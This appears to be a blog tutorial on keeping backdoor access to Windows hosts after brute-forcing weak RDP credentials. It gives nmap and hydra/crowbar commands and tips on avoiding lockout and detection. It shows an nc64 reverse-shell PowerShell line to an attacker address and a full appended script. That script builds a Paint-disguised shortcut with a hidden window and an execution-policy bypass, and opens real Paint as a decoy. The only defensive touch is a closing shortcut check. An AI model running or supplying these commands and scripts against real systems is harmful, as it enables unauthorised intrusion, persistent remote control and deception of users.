hamidullahbayram

Persistence on Windows with BackDoors (1/4)

Updated: 12 May 2023

To avoid losing the access gained on a target, we should set up alternative ways to get back in without exploiting it again, because re-exploitation may not be possible later (the flaw may be patched, the service may change). Establishing persistence is therefore one of the first post-exploitation steps; its purpose is stable, repeatable access. The most common way is a backdoor that can be executed whenever the host is up. This article series covers backdoor persistence on a Windows host reached over a weakly protected RDP service:

1. Shortcut .exe files from System32

2. Using executable files modified by msfvenom

3. Dumping hashes and assigning admin privileges for unprivileged users

4. Windows Login screen with Sticky Keys or Utilman




First task: discover whether the RDP port (3389/TCP) is open. "Vulnerable" here means reachable and protected only by a guessable password; the steps below rely on weak Administrator credentials, not on a software flaw in RDP itself.


nmap -p 3389 -v --open 10.10.190.1/24



If RDP is among the open ports, continue with a brute-force attack against the Windows logon using hydra or crowbar for the user "Administrator". Keep the attempt rate low (crowbar's -n 1 uses a single thread): an account lockout policy on the target will lock the account after a handful of failures, and failed logons are recorded as Windows Security events, so a noisy attack is both self-defeating and easy to spot.


hydra -l Administrator -P pass_File 10.10.190.77 rdp


crowbar -b rdp -s 10.10.190.77/32 -u Administrator -C pass_File -n 1


1. Shortcut .exe files from System32

With the recovered credentials we can open an RDP session to the host (the password can be given with /p or typed at the prompt):

xfreerdp /u:"user" /p:"password" /v:host_IP:3389



Plant a shortcut to one of the .exe files in System32, such as Calculator (calc.exe) or Paint (mspaint.exe), somewhere the user will click it, for example the Desktop.


Copy the following PowerShell line into Notepad and save it with a .ps1 extension. It assumes nc64.exe (Netcat for Windows) has already been copied to c:\tools on the target; replace attacker_IP and listening_Port with your listener's address and port:

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe attacker_IP listening_Port"






Now change the shortcut's target (right-click, Properties, Target) so that it runs the script instead of the original executable, while keeping the Paint icon and name:

powershell.exe -WindowStyle hidden path_of_ps1_file

If the host's execution policy refuses to run scripts, add -ExecutionPolicy Bypass -File in front of the script path. Note that a shortcut whose target is powershell.exe with a hidden window is itself a common hunting indicator, so check what the shortcut resolves to before relying on it.


Start an nc listener on listening_Port on the attacker machine to receive the reverse shell.

When the victim double-clicks the shortcut, believing they are opening Paint, the script runs hidden and the attacker gets a shell on the listener. Because the one-line script above only starts nc, nothing visible happens on the victim's desktop; a user who expected Paint to open may become suspicious, so in practice the script should also launch the real program.
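The script and shortcut steps above, carried out from PowerShell instead of by hand, as an added example that is not part of the original post. It assumes nc64.exe already sits at C:\tools\nc64.exe on the target (as the script above does); the attacker address, port and file locations are placeholder assumptions to be replaced. It goes beyond the post's one-liner in two ways: the dropped script also opens the real Paint so the decoy holds up, and the shortcut passes -ExecutionPolicy Bypass -File so the script runs regardless of the host's execution policy.

```powershell
# Added example (not from the original post): build a Paint-lookalike shortcut
# that silently launches a reverse-shell script. Assumptions: nc64.exe is at
# C:\tools\nc64.exe on the target; the values below are placeholders.
$AttackerIP   = "10.10.14.5"         # assumption: attacker's listener address
$AttackerPort = 4444                 # assumption: port of the nc listener
$ScriptPath   = "C:\tools\rev.ps1"   # assumption: where the .ps1 is dropped
$LinkPath     = Join-Path ([Environment]::GetFolderPath("Desktop")) "Paint.lnk"

# 1. The script the shortcut will run. It opens the real Paint first so the
#    user sees what they expect, then starts nc64 with cmd.exe bound to the
#    connection back to the listener.
@"
Start-Process -FilePath "C:\Windows\System32\mspaint.exe"
Start-Process -NoNewWindow -FilePath "C:\tools\nc64.exe" -ArgumentList "-e cmd.exe $AttackerIP $AttackerPort"
"@ | Set-Content -Path $ScriptPath -Encoding ASCII

# 2. The shortcut. WScript.Shell is the COM interface used to read and write
#    .lnk files; TargetPath/Arguments are what the Properties dialog shows.
$Shell    = New-Object -ComObject WScript.Shell
$Shortcut = $Shell.CreateShortcut($LinkPath)
$Shortcut.TargetPath   = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
$Shortcut.Arguments    = "-WindowStyle Hidden -ExecutionPolicy Bypass -File `"$ScriptPath`""
$Shortcut.IconLocation = "$env:SystemRoot\System32\mspaint.exe,0"   # borrow Paint's icon
$Shortcut.WindowStyle  = 7        # 7 = start minimized, so the console barely shows
$Shortcut.Description  = "Paint"  # tooltip text the user sees on hover
$Shortcut.Save()

# 3. Read the shortcut back and show what it really points at. This is the
#    same check a defender runs when hunting for .lnk files whose target is
#    powershell.exe rather than the program the icon suggests.
$Check = $Shell.CreateShortcut($LinkPath)
"{0} {1}" -f $Check.TargetPath, $Check.Arguments
```

On the attacker side the listener is a plain Netcat listener on the chosen port (for example `nc -lvnp 4444`). The read-back in step 3 prints the powershell.exe path followed by the hidden-window arguments; any shortcut on a user's Desktop that resolves like this, while wearing the icon of a System32 program, is worth treating as a backdoor until proven otherwise.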


